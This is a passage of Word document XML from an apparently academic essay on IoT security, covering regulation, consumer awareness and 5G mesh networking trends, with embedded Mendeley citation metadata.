        <w:t xml:space="preserve">within IoT devices </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">but also the ‘optional’ voluntary  implementation of this framework. </w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"As we connect more devices in our homes to the internet, products and appliances that have traditionally been offline are now becoming part of the ‘Internet of Things’ (IoT). The IoT represents a new chapter of how technology becomes increasingly common in our homes, making people’s lives easier and more enjoyable. As people entrust an increasing amount of personal data to online devices and services, the cyber security of these products is now as important as the physical security of our homes. The aim of this Code of Practice is to support all parties involved in the development, manufacturing and retail of consumer IoT with a set of guidelines to ensure that products are secure by design and to make it easier for people to stay secure in a digital world. The Code of Practice brings together, in thirteen outcome-focused guidelines, what is widely considered good practice in IoT security. It has been developed by the Department for Digital, Culture, Media and Sport (DCMS), in conjunction with the National Cyber Security Centre (NCSC), and follows engagement with industry, consumer associations and academia. The Code was first published in draft in March 2018 as part of the Secure by Design report.","author":[{"dropping-particle":"","family":"Department for Digital Culture Media and Sport","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"GOV.UK","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Code of Practice for Consumer IoT Security","type":"report"},"uris":["http://www.mendeley.com/documents/?uuid=6d63224f-fb26-47c3-8104-7105294f6841"]}],"mendeley":{"formattedCitation":"[49]","plainTextFormattedCitation":"[49]","previouslyFormattedCitation":"[49]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B51C9E" w:rsidRPr="00B51C9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[49]</w:t>
      </w:r>
      <w:r w:rsidR="00B51C9E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673186B" w14:textId="77777777" w:rsidR="00121F48" w:rsidRDefault="00121F48" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9A042D" w14:textId="6EF7E08F" w:rsidR="00856D4C" w:rsidRDefault="00121F48" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Around the </w:t>
      </w:r>
      <w:r w:rsidR="00856D4C">
        <w:t>world there</w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve"> no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> universal</w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve"> IoT laws that </w:t>
      </w:r>
      <w:r w:rsidR="00D83E75">
        <w:t>mandate</w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve"> companies to follow</w:t>
      </w:r>
      <w:r w:rsidR="00440F43">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve">to protect the consumers of IoT devices </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from falling victim to cybercrime, </w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve">and until </w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t>a universal law</w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t xml:space="preserve"> put in place,</w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t xml:space="preserve">the majority of </w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve">IoT devices will </w:t>
      </w:r>
      <w:r w:rsidR="001B745D">
        <w:t>remain to</w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve"> be vulnerable because of the additional cost</w:t>
      </w:r>
      <w:r w:rsidR="00440F43">
        <w:t xml:space="preserve"> and expertise</w:t>
      </w:r>
      <w:r w:rsidR="00923407">
        <w:t xml:space="preserve"> that needs to be put in place by IoT device manufacturers to </w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t>efficiently</w:t>
      </w:r>
      <w:r w:rsidR="00856D4C">
        <w:t xml:space="preserve"> secure their devices from exploitation. </w:t>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Katherine Britton is an attorney in Dallas, TX and is a Certified Information Privacy Professional (CIPP/US) through the International Association of Privacy Professionals. Her practice focuses on complex litigation cases, including antitrust, consumer protection, qui tam, management-side labor and employment cases, and breach of contract cases and counseling on employment, human resources, and privacy law matters. preferences that do not account for the risks involv-ing IoT, which include the potential for seamless cyber and physical surveillance, unauthorized use of data, identity theft, and cybersecurity attacks. This article covers the technologies involved in IoT and the privacy and security risks to consumers whose information is gathered continuously and inse-curely stored in the commercial space.","author":[{"dropping-particle":"","family":"Britton","given":"Katherine","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"JOURNAL OF INTERNET LAW","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"Handling Privacy and Security in the Internet of Things","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=1745ca62-6a52-44d6-b9e7-44c7ded2b8d8"]}],"mendeley":{"formattedCitation":"[50]","plainTextFormattedCitation":"[50]","previouslyFormattedCitation":"[50]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00227A82" w:rsidRPr="00227A82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[50]</w:t>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B3179" w14:textId="77777777" w:rsidR="00856D4C" w:rsidRDefault="00856D4C" w:rsidP="002A443D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717BBDE2" w14:textId="78456805" w:rsidR="00DF4A23" w:rsidRDefault="00856D4C" w:rsidP="00BE6774">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Public awareness of the security implications within the use </w:t>
      </w:r>
      <w:r w:rsidR="00C65EE2">
        <w:t>of IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devices also needs to be promoted by governments, so that consumers who are not knowledgeable within cybersecurity can make an informed decision about if they are comfortable with letting these potential ‘Big Brother’ devices into their personal lives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5C127F" w14:textId="77777777" w:rsidR="00BE6774" w:rsidRDefault="00BE6774" w:rsidP="00BE6774">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740E58CC" w14:textId="55D14217" w:rsidR="00403E69" w:rsidRDefault="004464CD" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cybersecurity Future Trends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EBE22" w14:textId="39AB3329" w:rsidR="0049718F" w:rsidRDefault="00B77EF4" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next major milestone within the </w:t>
      </w:r>
      <w:r w:rsidR="00A008BE">
        <w:t>ever-growing</w:t>
      </w:r>
      <w:r w:rsidR="000F4472">
        <w:t xml:space="preserve"> interconnected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> world that we live and the IoT devices that are utilised within it</w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00262319">
        <w:t xml:space="preserve"> the advent of </w:t>
      </w:r>
      <w:r w:rsidR="00100743">
        <w:t>5G</w:t>
      </w:r>
      <w:r w:rsidR="00262319">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002032E8">
        <w:t>wireless</w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00262319">
        <w:t>mesh</w:t>
      </w:r>
      <w:r w:rsidR="00A008BE">
        <w:t xml:space="preserve"> WAN and</w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t xml:space="preserve"> Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidR="00A008BE">
        <w:t xml:space="preserve"> LAN</w:t>
      </w:r>
      <w:r w:rsidR="00303190">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007C5A08">
        <w:t xml:space="preserve">that will </w:t>
      </w:r>
      <w:r w:rsidR="00A008BE">
        <w:t>also</w:t>
      </w:r>
      <w:r w:rsidR="007C5A08">
        <w:t xml:space="preserve"> be </w:t>
      </w:r>
      <w:r w:rsidR="00607640">
        <w:t>utilised</w:t>
      </w:r>
      <w:r w:rsidR="007C5A08">
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidR="00607640">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00A008BE">
        <w:t>Machine-2-Machine (M2M) learning</w:t>
      </w:r>
      <w:r w:rsidR="007C5A08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002032E8">
        <w:t>of IoT</w:t>
      </w:r>
      <w:r w:rsidR="00607640">
        <w:t xml:space="preserve"> devices</w:t>
      </w:r>
      <w:r w:rsidR="007C5A08">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9" w:rsidRPr="004B2AB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t xml:space="preserve">5G mesh 802.11ax networking is thought to revolutionise the world of IoT bringing the purest form of </w:t>
      </w:r>
      <w:r w:rsidR="00035C16">
        <w:t>the long</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t>awaited ‘Smart Cities’</w:t>
      </w:r>
      <w:r w:rsidR="009B2D9D">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t xml:space="preserve">fruition </w:t>
      </w:r>
      <w:r w:rsidR="009B2D9D">
        <w:t xml:space="preserve">that will allow the convergence of every IoT device into one network, </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t>that will work</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t xml:space="preserve">hand in hand with advanced IoT applications that will have M2M </w:t>
      </w:r>
      <w:r w:rsidR="009B2D9D">
        <w:t>autonomous</w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F014E">
        <w:t xml:space="preserve">semi </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t xml:space="preserve">Artificial </w:t>
      </w:r>
      <w:r w:rsidR="00C71A96">
        <w:t>Intelligent (</w:t>
      </w:r>
      <w:r w:rsidR="007F014E">
        <w:t xml:space="preserve">AI) </w:t>
      </w:r>
      <w:r w:rsidR="00B72C52">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.7551/mitpress/7496.003.0016","abstract":"One long-term goal of machine learning research is to produce methods that are applicable to highly complex tasks, such as perception (vision, audition), rea- soning, intelligent control, and other artificially intelligent behaviors. We argue that in order to progress toward this goal, the Machine Learning community must endeavor to discover algorithms that can learn highly complex functions, withmin- imal need for prior knowledge, and with minimal human intervention. We present mathematical and empirical evidence suggesting that many popular approaches to non-parametric learning, particularly kernel methods, are fundamentally lim- ited in their ability to learn complex high-dimensional functions. Our analysis focuses on two problems. First, kernel machines are shallow architectures, in which one large layer of simple template matchers is followed by a single layer of trainable coefficients. We argue that shallow architectures can be very ineffi- cient in terms of required number of computational elements and examples. Sec- ond, we analyze a limitation of kernel machines with a local kernel, linked to the curse of dimensionality, that applies to supervised, unsupervised (manifold learn- ing) and semi-supervised kernel machines. Using empirical results on invariant image recognition tasks, kernel methods are compared with deep architectures, in which lower-level features or concepts are progressively combined into more ab- stract and higher-level representations. We argue that deep architectures have the potential to generalize in non-local ways, i.e., beyond immediate neighbors, and that this is crucial in order to make progress on the kind of complex tasks required for artificial intelligence. 1","author":[{"dropping-particle":"","family":"Kulkarni","given":"Guradatt","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Large-Scale Kernel Machines","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"Scaling Learning Algorithms toward AI","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=ad44c4d6-ff00-41ac-b3bd-e63d897336ca"]}],"mendeley":{"formattedCitation":"[51]","plainTextFormattedCitation":"[51]","previouslyFormattedCitation":"[51]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B72C52">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B72C52" w:rsidRPr="00B72C52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[51]</w:t>
      </w:r>
      <w:r w:rsidR="00B72C52">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B72C52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t>capabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/s11277-018-5618-4","ISSN":"1572834X","abstract":"The concept of “Smart Cities” is very important as it aims to uplift the living standards of the residents by greatly improving the City’s Infrastructure, Traffic management, Governance, Water and Waste management, Power management, Health systems, Safety and Security systems, Education systems etc. This paper describes the concept of Smart Cities and enumerates its various benefits. It describes various Services and Applications required to make a City Smart and the role of ICT technologies in their implementation. Further, the challenges in the current ICT systems are discussed in their role to Smart City implementation. The paper discusses the proposed features of 5G technologies and describes how 5G could be the best answer for successful, implementation of Smart Cities. It lists down a few Smart City Use Cases which are enabled by 5G. 5G will act as the backbone of IoT and pave the way for the development of Smart Cities. © 2018, Springer Science+Business Media, LLC, part of Springer Nature.","author":[{"dropping-particle":"","family":"Rao","given":"Sriganesh K.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Prasad","given":"Ramjee","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Wireless Personal Communications","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Impact of 5G Technologies on Smart City Implementation","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=a7910e5d-d362-4758-bcb2-b8a04cbd3245"]},{"id":"ITEM-2","itemData":{"DOI":"10.1109/NGMAST.2015.10","ISBN":"9781479986606","abstract":"This paper describes Internet of Things (IoT) and Machine-to-Machine (M2M) communications as the enablers of smart city initiatives. The challenges in modern cities are briefly identified. Utilization of IoT based applications and services could mitigate these challenges. The paper then introduces an architecture based on oneM2M standards for smart cities. The key elements of the architecture are described along with the common service functions. The main contributions of the work are – (i) uniform metadata exchange with things using Sensor Markup Language and its extensions, (ii) uniform description of heterogeneous things for configuration management, (iii) OMA Lightweight M2M based device management framework, (iv) resource discovery framework and (v) Machine-to-Machine Measurement framework based M2M data processing and analytics. The core functionalities of these frameworks are exposed to the consumers through RESTful web services. An application scenario on crowdsourcing in the smart cities is highlighted. Finally the paper concludes with future research directions.","author":[{"dropping-particle":"","family":"Datta","given":"Soumya Kanti","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bonnet","given":"Christian","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Proceedings - NGMAST 2015: The 9th International Conference on Next Generation Mobile Applications, Services and Technologies","id":"ITEM-2","issued":{"date-parts":[["2016"]]},"title":"Internet of Things and M2M Communications as Enablers of Smart City Initiatives","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=c3b64e25-033a-4ebd-a8a0-df4f3a129670"]}],"mendeley":{"formattedCitation":"[27], [52]","plainTextFormattedCitation":"[27], [52]","previouslyFormattedCitation":"[27], [52]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B72C52" w:rsidRPr="00B72C52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[27], [52]</w:t>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775602E" w14:textId="77777777" w:rsidR="00C71A96" w:rsidRDefault="00C71A96" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172587BC" w14:textId="2FAEFB4C" w:rsidR="002032E8" w:rsidRPr="002032E8" w:rsidRDefault="002032E8" w:rsidP="002032E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002032E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5G Wireless Mesh </w:t>
      </w:r>
      <w:r w:rsidR="00FD4D5F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F21BAFD" w14:textId="244BCA1F" w:rsidR="002032E8" w:rsidRDefault="002032E8" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5G </w:t>
      </w:r>
      <w:r w:rsidR="00B72C52">
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve">operate at higher frequencies </w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t xml:space="preserve">bands </w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t xml:space="preserve"> between </w:t>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:t xml:space="preserve">24GHz and </w:t>
      </w:r>
      <w:r w:rsidR="00227A82" w:rsidRPr="00227A82">
        <w:t>86 GHz</w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:t xml:space="preserve"> in the IoT millimetre wave (mm-wave) Radio Frequency (RF)</w:t>
      </w:r>
      <w:r w:rsidR="00227A82" w:rsidRPr="00227A82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:t xml:space="preserve">that have been previously </w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:t>unused. The current</w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve"> 3G and 4G </w:t>
      </w:r>
      <w:r w:rsidR="00227A82" w:rsidRPr="00227A82">
        <w:t>Long-Term Evolution (</w:t>
      </w:r>
      <w:r w:rsidR="00770133" w:rsidRPr="00227A82">
        <w:t>LTE</w:t>
      </w:r>
      <w:r w:rsidR="00227A82" w:rsidRPr="00227A82">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:t xml:space="preserve"> (600Mhz-6GHz)</w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t>networks</w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:t xml:space="preserve">that 5G will also utilise for 5G LTE communications  </w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t>these higher frequencies</w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve"> allows for </w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t>ultra-fast</w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve"> throughput of between </w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t xml:space="preserve">1Gb/s and </w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t>Gb/s</w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t xml:space="preserve"> that is far</w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t>greater</w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve"> than current traffic</w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t>being generated within both Wireless Wide Area Networks (WWAN) and Wireless Local Area Networks (WLAN)</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA" w:rsidRPr="00CF48EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/MWC.2010.5416357","ISBN":"1536-1284 VO - 17","ISSN":"15361284","PMID":"5416357","abstract":"The wireless local area network standard IEEE 802.11 is the preferred solution for lowcost data services. Key to its success are the 2.4 and 5 GHz unlicensed bands. The transmit power limitations imposed due to regulatory requirements limit the range (coverage) that can be achieved by WLANs in these bands. However, the demand for \"larger\" wireless infrastructure is emerging, ranging from office/university campuses to city-wide deployments. To overcome the limitations of singlehop communication, data packets need to traverse over multiple wireless hops, and wireless mesh networks are called for. Since 2004 Task Group S has been developing an amendment to the 802.11 standard to exactly address the aforementioned need for multihop communication. Besides introducing wireless frame forwarding and routing capabilities at the MAC layer, the 802.11s amendment brings new interworking and security. In this article, we provide insights into the latest developments in 802.11s and explain how the overall mesh concept fits into the 802 set of networking standards.","author":[{"dropping-particle":"","family":"Hiertz","given":"Guido R.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Denteneer","given":"Dee","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Max","given":"Sebastian","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Taori","given":"Rakesh","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Cardona","given":"Javier","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Berlemann","given":"Lars","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Walke","given":"Bernhard","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Wireless Communications","id":"ITEM-1","issue":"1","issued":{"date-parts":[["2010"]]},"page":"104-111","title":"IEEE 802.11s: The WLAN Mesh Standard","type":"article-journal","volume":"17"},"uris":["http://www.mendeley.com/documents/?uuid=edda02ce-f240-4148-87a4-d410050b0e9b"]}],"mendeley":{"formattedCitation":"[53]","plainTextFormattedCitation":"[53]","previouslyFormattedCitation":"[53]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF48EA" w:rsidRPr="00CF48EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[53]</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve">, this massive increase in wireless data </w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t>transmission</w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve"> will vastly reduce the latency within </w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t>existing</w:t>
      </w:r>
      <w:r w:rsidR="00245F5C">
        <w:t xml:space="preserve"> wireless networks</w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t xml:space="preserve">, which is great for consumers </w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t xml:space="preserve">who have seen a steep increase in latency within cellular and Wi-Fi telecommunications because of the large increase in devices being utilised by </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t>the general public</w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t xml:space="preserve"> over the last decade and</w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00DB5F7A">
        <w:t xml:space="preserve">IoT technology companies </w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t xml:space="preserve">who can produce much larger </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t>advance</w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t xml:space="preserve"> M2M </w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t xml:space="preserve">IoT applications </w:t>
      </w:r>
      <w:r w:rsidR="00BA6FC9">
        <w:t xml:space="preserve">and devices </w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t>that are not currently viable within existing 4G networks</w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t xml:space="preserve"> because of the high latency and lower throughput rates previously discussed.</w:t>
      </w:r>
      <w:r w:rsidR="00227A82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/MVT.2015.2390931","ISSN":"15566072","abstract":"Samsung Electronics announced what it claims are two industryfirst milestones in the development of fifth-generation (5G) telecommunications networking technology, as the company clocked 7.5 Gb/s, the fastest-ever 5G data transmission rate while in a stationary environment. The company was also the industry's first to achieve an uninterrupted and stable connection at 1.2 Gb/s in a mobile environment from a vehicle traveling at over 100 km/h. In addition, Samsung's recent stationary test was also the industry's first successful 5G test that was conducted in an outdoor setting. Previous successful 5G tests throughout the industry have been conducted in stabilized indoor environments, including laboratories. Meanwhile, the mobile test took 5G testing to another level, as it was conducted from a vehicle racing at high speeds on a 4.35-km professional outdoor race track. Both the stationary and mobile tests were conducted over a 28-GHz 5G network. Until now, the industry as a whole has not used higher frequencies, such as 28 GHz, despite their speed-related benefits, due to the likes of short communication range. However, the company claims to overcome these obstacles through its own hybrid adaptive array technology, which uses millimeter-wave frequency bands to enable the use of higher frequencies over greater distances. The recent milestones were also a sevenfold increase upon testing results from May 2013, when the company became the industry's first to achieve 1 Gb/s over a 28-GHz 5G network.","author":[{"dropping-particle":"","family":"Gozalvez","given":"Javier","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Vehicular Technology Magazine","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"Samsung electronics sets 5G speed record at 7.5 